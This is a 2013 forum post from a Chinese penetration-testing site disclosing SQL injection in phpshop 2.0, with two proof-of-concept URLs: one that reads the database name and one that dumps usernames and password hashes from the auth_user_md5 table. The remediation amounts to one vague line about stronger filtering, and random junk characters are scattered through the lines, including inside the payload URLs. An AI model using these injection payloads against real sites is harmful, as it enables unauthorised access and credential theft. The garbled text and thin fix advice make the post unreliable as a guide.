中国网络渗透测试联盟

标题: phpshop 2.0 SQL注入及修复 [打印本页]

作者: admin    时间: 2013-1-18 18:24
标题: phpshop 2.0 SQL注入及修复
标题 : phpshop 2.0 SQL Injection Vulnerability
& @$ e7 Z4 T3 v" y7 [$ s! ~, k* y, u- h" E- h8 ~$ ]
作者 : By onestree
/ H! Z# Y2 T8 I% s% X6 d& {/ h下载地址 : http://code.google.com/p/phpshop/downloads/list8 {9 a9 ~: t2 G$ H# M" M
测试地址: windows 7 / ubuntu! }' q3 E; O( e, }% N2 \/ W& c

& u( O- U( I" z5 X- a2 W& f6 E
. v$ Z" Z- \1 ?( h" SSQLi p0c:
5 W& K# X0 V' s# ~
$ V: d' U1 T' Z* x7 G; G" ?$ R==================
0 \7 C/ m' y5 c* D
0 b* T; k  \9 h. `$ {; F$ ]' Vhttp://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
( m% \0 s$ v+ _$ `& Iunion select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
9 N& {$ T  b  {& w6 Y; B 6 L5 p3 c4 c9 B
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--' O" s+ H' j) c

0 ~* c3 O; Z( g0 i修复:( n1 T, d- C, Z6 R) {3 ^1 p7 E
加强过滤
2 ~1 E( c0 O$ `+ R# B9 X, Y. R% H/ ]/ s. U
6 E& s- R8 z. i( Z





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2